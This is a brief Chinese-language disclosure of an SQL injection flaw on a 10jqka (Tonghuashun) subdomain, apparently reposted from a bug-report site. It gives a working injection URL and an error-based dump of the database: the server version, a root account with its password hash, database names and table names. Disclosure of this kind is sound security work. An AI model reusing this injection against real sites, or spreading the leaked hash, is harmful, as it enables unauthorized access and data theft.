db权限:root possibile to getshell 漏洞 证明:http://mobile.10jqka测试数据.cn/main/dlquery_s.php?bid=%274229&bname=%CD%A8%D3%C3%C7%F8&seid=1329&sename= Android &mid=61&mname=Gpad&tyid=2705 DB Server: MySQL error based Resp. Time(avg): 2490 ms Current User: root@localhost Sql Version: 5.0.95 Current DB: wap3g_dl System User: root@localhost Host Name: wapyd Installation dir: /usr/ DB User & Pass: root::127.0.0.1 ::localhost ::localhost.localdomain root:07846796735f00a7:localhost Data Bases: information_schema ahuni_dl asv ceshi ceshi_dl ceshi_fj data_web wap3g_dl Table Name recordDl_20110601 recordDl_20110531 recordDl_20110530 recordDl_20110529 recordDl_20110528 recordDl_20110527 recordDl_20110526 recordDl_20110525 recordDl_20110524 recordDl_20110523 recordDl keyword example_stat dl_version dl_verintro dl_tyrj dl_sp dl_soft dl_series dl_plateform dl_new_model dl_model dl_config dl_brand check_ver account 修复方案: 输入点需要过滤 作者 insight-labs
查看更多关于同花顺某分站的一个注入漏洞 - 网站安全 - 自学的详细内容...